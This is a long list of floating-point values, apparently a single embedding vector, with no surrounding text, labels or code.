0.01542921643704176, 0.0019133181776851416, -0.000013616739124699961, 0.010938114486634731, -0.021630888804793358, -0.023198343813419342, 0.021903488785028458, 0.014856753870844841, 0.01942281983792782, 0.015047574415802956, -0.008641451597213745, -0.0048965951427817345, 0.019477341324090958, -0.0060926321893930435, 0.010876779444515705, -0.008075804449617863, -0.02186259999871254, 0.035247307270765305, -0.014366072602570057, 0.012655501253902912, -0.0052918666042387486, 0.00549290981143713, 0.0109040392562747, -0.003027574857696891, 0.012519200332462788, 0.03164897486567497, 0.004637624137103558, 0.011244790628552437, -0.024765800684690475, -0.00574165815487504, 0.008675526827573776, -0.010338393040001392, 0.0020598412957042456, 0.0017259049927815795, -0.0007901169592514634, -0.005400907248258591, -0.012273859232664108, -0.01200807373970747, -0.009922675788402557, 0.01208985410630703, -0.0011176640400663018, 0.018741318956017494, -0.017242012545466423, -0.021044796332716942, 0.002490891609340906, -0.012580535374581814, 0.014366072602570057, 0.00797357875853777, -0.011892218142747879, -0.008191660046577454, 0.01060417853295803, 0.01225341483950615, 0.0009728447766974568, -0.008566485717892647, -0.001223296974785626, 0.011551466770470142, -0.01804618537425995, -0.0015308249276131392, -0.001347671146504581, -0.033311840146780014, -0.004228722769767046, 0.01084951963275671, 0.02533826231956482, -0.022216981276869774, 0.017078451812267303, 0.0034177349880337715, -0.008559671230614185, 0.011319756507873535, 0.00013874964497517794, 0.002564153168350458, 0.0069308802485466, 0.02347094565629959, 0.008034913800656796, 0.016110718250274658, -0.00913213286548853, 0.006620796397328377, 0.012716836296021938, 0.00287082907743752, -0.0025948206894099712, -0.013534639030694962, -0.020799456164240837, 0.03920002281665802, 0.011769548058509827, 0.011163010261952877, 0.016097089275717735, -0.009084427729249, -0.03246677666902542, 0.002695342293009162, 0.024888470768928528, 0.02682393789291382, 0.009357028640806675, 0.005591727793216705, 0.02323923446238041, 0.0016824592603370547, 0.003203061642125249, 0.002477261470630765, -0.0223532821983099, 0.003019056050106883, -0.01360960491001606, 0.0059904069639742374, 0.005860921461135149, 0.008709602057933807, -0.016587769612669945, 0.02832324244081974, 0.021671779453754425, -0.006470866035670042, -0.011190271005034447, 0.017800845205783844, -0.013050772249698639, -0.004719404503703117, 0.036964695900678635, -0.03042227029800415, -0.013507379218935966, 0.004221907816827297, 0.021848969161510468, 0.005666693206876516, 0.0007607271545566618, -0.0023886661510914564, 0.017296532168984413, 0.005857513751834631, 0.0033035832457244396, -0.017909884452819824, 0.01390946563333273, 0.018618647009134293, 0.009418364614248276, 0.01916384883224964, 0.0011977405520156026, 0.0009157689637504518, -0.0027055649552494287, -0.011899033561348915, -0.012485125102102757, -0.02683756686747074, -0.00771460821852088, -0.0010205499129369855, 0.019777201116085052, -0.004330948460847139, 0.0018110928358510137, 0.0157427079975605, 0.014979424886405468, -0.0003822802973445505, 0.014284292235970497, 0.011769548058509827, -0.0109040392562747, 0.006314120255410671, -0.009098057635128498, -0.009847710840404034, 0.0029372756835073233, -0.010283872485160828, -0.00290660816244781, -0.005019265692681074, 0.009670520201325417, 0.01987261138856411, 0.012457865290343761, -0.002259180648252368, 0.0028691254556179047, 0.024084297940135002, 0.010726848617196083, 0.019790831953287125, -0.002318812068551779, 0.00977274589240551, -0.008232549764215946, -0.0021382139530032873, 0.015647297725081444, -0.0019542083609849215, -0.0006295379134826362, 0.025747163221240044, -0.019954392686486244, 0.010992635041475296, -0.007959948852658272, -0.0045353989116847515, 0.03113103285431862, -0.003966344520449638, 0.001679903594776988, -0.005353202112019062, 0.01717386208474636, -0.006869545206427574, -0.0025948206894099712, -0.010399728082120419, -0.0026271920651197433, -0.0012386307353153825, -0.00911168847233057, -0.0017046080902218819, 0.0015631963033229113, -0.0055099474266171455, -0.03140363469719887, -0.009813635610044003, 0.0008058766834437847, 0.020226992666721344, 0.012464680708944798, -0.012335195206105709, -0.016097089275717735, 0.03164897486567497, -0.029413646087050438, 0.000689169391989708, 0.01567455753684044, 0.018073445186018944, -0.003867526538670063, 0.015660926699638367, -0.0014073025668039918, 0.0035404053051024675, 0.01761002466082573, -0.010658699087798595, 0.0003196672478225082, -0.012355639599263668, -0.006913842633366585, 0.0077895731665194035, -0.0251747015863657, -0.0059904069639742374, 0.012600980699062347, -0.01060417853295803, -0.018564127385616302, 0.00966370478272438, -0.004647846799343824, 0.020935755223035812, 0.029304606840014458, -0.010215722024440765, 0.024193337187170982, -0.010338393040001392, -0.010706404224038124, -0.008839087560772896, 0.017746323719620705, -0.005049933213740587, 0.013766350224614143, -0.000994993606582284, -0.00838929507881403, 0.01932740956544876, -0.004075384698808193, -0.004007234703749418, 0.0024925952311605215, -0.009684150107204914, 0.0075714923441410065, -0.01650599017739296, 0.000593333097640425, 0.007687347941100597, 0.0033972898963838816, -0.0075783077627420425, 0.008730046451091766, 0.013984430581331253, -0.0020853974856436253, 0.007489712443202734, -0.0031587639823555946, 0.015620036981999874, -0.004658069461584091, 0.0038845641538500786, 0.01035202294588089, -0.0049034105613827705, -0.009023092687129974, 0.012614610604941845, 0.01755550317466259, -0.005111268721520901, 0.003267804393544793, -0.01418888196349144, -0.00833477545529604, -0.003131503937765956, -0.001317003509029746, 0.010706404224038124, -0.021739929914474487, -0.008402925916016102, -0.007496527396142483, 0.009125318378210068, -0.018373306840658188, 0.011973998509347439, 0.003295064438134432, 0.012382900342345238, 0.005131713580340147, 0.017296532168984413, -0.010815444402396679, 0.011939923278987408, 0.02843228355050087, -0.003393882419914007, -0.015333806164562702, -0.022435061633586884, -0.005636025685817003, -0.03505648672580719, -0.008184844627976418, -0.003973159473389387, 0.01270320639014244, -0.03036775067448616, 0.01672407053411007, 0.005608765408396721, -0.001634754124097526, -0.010454247705638409, 0.005049933213740587, 0.001357893692329526, 0.02158999815583229, -0.011721842922270298, 0.021290138363838196, 0.0051453434862196445, -0.010283872485160828, 0.013691384345293045, 0.030504051595926285, 0.002904904307797551, 0.0279961209744215, 0.023975256830453873, 0.01833241619169712, 0.014829494059085846, 0.003956121858209372, -0.013575529679656029, 0.010754109360277653, -0.0014251921093091369, 0.002966239582747221, -0.004876150283962488, 0.01341196894645691, 0.023225603625178337, 0.01733742281794548, 0.010052161291241646, -0.011442426592111588, -0.0008548596524633467, 0.016928521916270256, -0.016478730365633965, -0.02015884406864643, 0.011742287315428257, -0.00036928916233591735, 0.004065162502229214, 0.011933108791708946, -0.008287070319056511, 0.0026067469734698534, -0.00016356058767996728, -0.016247019171714783, 0.011449242010712624, -0.0038504889234900475, 0.0069206575863063335, 0.006470866035670042, -0.013016697019338608, -0.0030837988015264273, -0.004225315526127815, -0.0055849128402769566, 0.014924904331564903, -0.012457865290343761, -0.014052581042051315, -0.01590626873075962, 0.013636864721775055, 0.01283269189298153, -0.015306545421481133, -0.007687347941100597, 0.015252025797963142, 0.0033717334736138582, 0.004378653597086668, -0.005734843201935291, 0.012791801244020462, 0.005830253474414349, 0.001155998557806015, -0.02032240480184555, -0.027028387412428856, 0.006355010438710451, 0.0028026788495481014, 0.0004651254275813699, 0.003051427425816655, -0.006539016496390104, -0.004262798000127077, -0.0022557731717824936, -0.007162590976804495, -0.0022029567044228315, -0.017732694745063782, 0.0171057116240263, -0.0033512883819639683, 0.0023171084467321634, -0.00011180900037288666, 0.01684674061834812, -0.005230531562119722, 0.005898403935134411, -0.004729627165943384, 0.019968023523688316, -0.003639223286882043, 0.0076737180352211, -0.012744096107780933, 0.0022762182634323835, 0.025869833305478096, -0.005738250911235809, -0.024166077375411987, 0.0016662735724821687, 0.021058427169919014, 0.008484706282615662, 0.005850698798894882, 0.00647427374497056, 0.022666772827506065, -0.013377893716096878, 0.005925664212554693, -0.008130325004458427, 0.041816990822553635, 0.01225341483950615, -0.025433672592043877, -0.015647297725081444, 0.008777751587331295, -0.0012871877988800406, 0.022843962535262108, -0.002789048943668604, 0.007482897024601698, -0.010624623857438564, 0.010392912663519382, -0.0012965584173798561, -0.005104453768581152, 0.0015521219465881586, 0.016492359340190887, 0.021331027150154114, -0.0029474981129169464, -0.00960918515920639, 0.019191110506653786, 0.016151608899235725, -0.012137559242546558, 0.03197609633207321, -0.02760085090994835, 0.007217111065983772, -0.021167466416954994, 0.005618988070636988, -0.0064572361297905445, 0.0031195776537060738, -0.00858693104237318, -0.015879007056355476, -0.024425048381090164, 0.010501952841877937, 0.00192865205463022, 0.00042806874262169003, -0.0019099107012152672, 0.01871405728161335, 0.01060417853295803, -0.0004527732089627534, -0.015810856595635414, 0.0037141884677112103, -0.007728238124400377, 0.0027413438074290752, 0.006518571171909571, -0.03423868492245674, 0.019231999292969704, 0.010590548627078533, 0.004658069461584091, 0.003669890807941556, 0.011619617231190205, 0.01822337694466114, -0.009104873053729534, 0.009425179101526737, -0.002226809272542596, -0.0019678384996950626, 0.007728238124400377, 0.007544232532382011, 0.0018996881553903222, -0.015333806164562702, -0.01634242944419384, -0.002168881706893444, 0.007612382527440786, 0.0032984719146043062, 0.032439518719911575, -0.0068490998819470406, 0.02218972146511078, 0.022503212094306946, 0.011640062555670738, -0.010011271573603153, 0.034647587686777115, -0.002881051739677787, -0.008109879679977894, 0.0030429086182266474, 0.02484758011996746, -0.01051558367908001, 0.02099027670919895, 0.02660585753619671, -0.01672407053411007, 0.017964405938982964, 0.0022983672097325325, 0.0138617604970932, 0.00379596883431077, 0.008048544637858868, 0.018863989040255547, -0.009834080934524536, -0.01844145730137825, 0.012212524190545082, 0.005912033841013908, -0.0051896413788199425, 0.01424340158700943, 0.014420592226088047, 0.015006684698164463, 0.024329638108611107, 0.015211135149002075, -0.015061204321682453, -0.009684150107204914, -0.014720453880727291, 0.022271500900387764, -0.04429766163229942, 0.012532830238342285, 0.001258223899640143, -0.0011082934215664864, -0.01578359678387642, -0.00008119463018374518, -0.01126523595303297, 0.004395691212266684, -0.00495452294126153, 0.0043922835029661655, 0.001249705208465457, -0.021126577630639076, -0.008341589942574501, -0.00838929507881403, -0.0013647087616845965, -0.003058242378756404, -0.004470656160265207, 0.009840895421802998, 0.013398339040577412, 0.010679143480956554, 0.006498126313090324, -0.007271631620824337, -0.01711934246122837, -0.015701817348599434, -0.0005426463321782649, 0.010358837433159351, -0.025965243577957153, -0.003359807189553976, -0.0020189511124044657, -0.027246469631791115, -0.012962177395820618, 0.003361511044204235, -0.006222117692232132, 0.01065188366919756, -0.01275091152638197, -0.0029628321062773466, 0.006487903650850058, -0.035628948360681534, -0.011217530816793442, -0.021998900920152664, 0.013296113349497318, -0.01905480958521366, -0.007516972254961729, 0.004494508728384972, 0.020117953419685364, 0.03410238400101662, -0.0009268433786928654, 0.021630888804793358, -0.0049749682657420635, 0.01833241619169712, 0.009929491207003593, 0.005850698798894882, 0.01518387533724308, -0.008791382424533367, 0.009861340746283531, -0.007959948852658272, 0.0035710730589926243, 0.010283872485160828, -0.003462032647803426, -0.010447433218359947, -0.002998610958456993, -0.006109669804573059, 0.01645147055387497, -0.0013834499986842275, -0.003741448512300849, -0.010147571563720703, -0.011135750450193882, -0.005571282934397459, -0.014052581042051315, -0.012471495196223259, -0.0035915181506425142, -0.019572751596570015, -0.019858982414007187, -0.0067468746565282345, -0.00015749096928630024, -0.025883464142680168, 0.021794449537992477, -0.009595555253326893, 0.002695342293009162, 0.01230793446302414, -0.021112946793437004, 0.016492359340190887, -0.007639642804861069, 0.024670390412211418, -0.018359676003456116, -0.002426148857921362, -0.018645908683538437, 0.012982621788978577, 0.02776441164314747, 0.01217163447290659, -0.008818642236292362, 0.01865953765809536, -0.0029883882962167263, 0.006355010438710451, -0.013377893716096878, 0.015115724876523018, 0.001196888741105795, 0.020690415054559708, -0.008212104439735413, 0.0003166856768075377, 0.008293884806334972, 0.005128306336700916, 0.00849833618849516, -0.001074218307621777, 0.0003107225347775966, -0.0023818511981517076, 0.018973028287291527, 0.011128935031592846, -0.013793610036373138, -0.0036358158104121685, -0.004620586987584829, -0.02886844426393509, 0.007121700793504715, -0.010372467339038849, 0.012035333551466465, 0.014993054792284966, 0.008048544637858868, 0.0025130403228104115, 0.0045388066209852695, 0.010277057066559792, 0.0007313373498618603, -0.00128037272952497, -0.01540195569396019, -0.011394721455872059, 0.0037380410358309746, 0.008396110497415066, -0.01733742281794548, -0.004797777626663446, 0.041489869356155396, 0.005094231106340885, 0.021658148616552353, 0.009561480022966862, -0.005233938805758953, 0.00007672227366128936, -0.0034824777394533157, -0.008034913800656796, -0.018455086275935173, -0.01905480958521366, -0.0007130219601094723, -0.004848890006542206, 0.010951744392514229, 0.01777358539402485, 0.01634242944419384, -0.013343818485736847, -0.008266624994575977, 0.0028878666926175356, -0.017868995666503906, -0.014257031492888927, 0.0047466647811234, -0.024806689471006393, 0.02423422783613205, -0.008184844627976418, -0.013718645088374615, 0.0018008702900260687, 0.026973867788910866, 0.01976357214152813, -0.004630809184163809, -0.03549264743924141, 0.01540195569396019, -0.01390946563333273, -0.0013791905948892236, -0.00969096552580595, 0.019477341324090958, 0.026019765064120293, -0.0034756625536829233, 0.008355220779776573, 0.009922675788402557, -0.017650913447141647, 0.03835495933890343, 0.010740479454398155, 0.0013689680490642786, -0.0051930490881204605, 0.003320620860904455, 0.006119892466813326, 0.003806191263720393, 0.00900264736264944, 0.00838929507881403, 0.014352441765367985, 0.0050737857818603516, 0.00015333805640693754, 0.021331027150154114, 0.014284292235970497, 0.0066003515385091305, -0.013316558673977852, 0.01927288994193077, -0.01523839496076107, -0.037891536951065063, -0.008000839501619339, 0.010338393040001392, -0.03181253746151924, 0.003721003420650959, 0.012117113918066025, -0.004634216893464327, 0.017037561163306236, 0.03156719356775284, 0.015442846342921257, -0.012076224200427532, 0.006000629160553217, -0.01394354086369276, -0.017432833090424538, 0.006866137497127056, 0.00607218686491251, -0.004593326710164547, -0.004266205709427595, 0.011190271005034447, -0.002105842577293515, 0.002862310502678156, 0.0033853636123239994, -0.002259180648252368, 0.0094933295622468, 0.009363844059407711, 0.006620796397328377, -0.0010265130549669266, -0.02268040180206299, -0.012614610604941845, 0.0011185159673914313, -0.0011159603018313646, 0.015688186511397362, 0.01596078835427761, -0.0015998270828276873, -0.0017403869424015284, -0.01771906390786171, -0.015579146333038807, -0.009316138923168182, -0.010208907537162304, 0.01650599017739296, 0.0017114230431616306, -0.014870383776724339, -0.002185919089242816, 0.00999082624912262, -0.014502372592687607, -0.0014899347443133593, 0.00902990810573101, -0.014516002498567104, -0.01217163447290659, 0.003058242378756404, 0.0034688476007431746, 0.009547850117087364, 0.016260650008916855, -0.007653272710740566, 0.01110167521983385, -0.001814500312320888, -0.005503132473677397, 0.02721920982003212, -0.004140127450227737, 0.011531022377312183, 0.016928521916270256, -0.007176220882683992, -0.011973998509347439, -0.000045122917072148994, 0.011994443833827972, -0.010801814496517181, 0.026142435148358345, 0.024670390412211418, 0.016655920073390007, 0.0056564705446362495, 0.008648266084492207, -0.006177819799631834, -0.011074415408074856, 0.014216141775250435, -0.00891405250877142, 0.01350056380033493, -0.008975387550890446, 0.030667612329125404, -0.022394170984625816, 0.022257870063185692, -0.023062044754624367, 0.013691384345293045, 0.0021927342750132084, 0.05100364610552788, -0.0018213153816759586, 0.011933108791708946, -0.008743676356971264, 0.011456056497991085, -0.026237845420837402, -0.0008574153180234134, -0.012880397029221058, -0.016097089275717735, 0.0032592855859547853, 0.026633117347955704, 0.016914891079068184, 0.0055099474266171455, -0.0047534797340631485, 0.034756626933813095, -0.013766350224614143, 0.008941312320530415, -0.00030369454179890454, -0.004177610389888287, -0.012451049871742725, 0.013902650214731693, 0.019013918936252594, -0.006607166491448879, 0.01523839496076107, 0.004153757821768522, 0.0062391553074121475, -0.021562738344073296, -0.005670100450515747, 0.015306545421481133, 0.0005396647611632943, 0.0065969438292086124, -0.0160153079777956, 0.022953003644943237, 0.01755550317466259, -0.004198055248707533, 0.019313780590891838, -0.007966764271259308, -0.0027549737133085728, 0.02843228355050087, 0.014734083786606789, 0.010467877611517906, -0.02229876071214676, 0.016260650008916855, 0.006740059703588486, -0.011496947146952152, -0.013057587668299675, -0.007830463349819183, -0.004562659189105034, -0.009145763702690601, 0.022107940167188644, 0.01612434908747673, 0.017964405938982964, -0.02484758011996746, -0.011190271005034447, -0.01208985410630703, -0.011142565868794918, 0.013786795549094677, 0.008375665172934532, -0.0022455507423728704, -0.003378548426553607, -0.007741868030279875, 0.009268433786928654, 0.023443685844540596 ]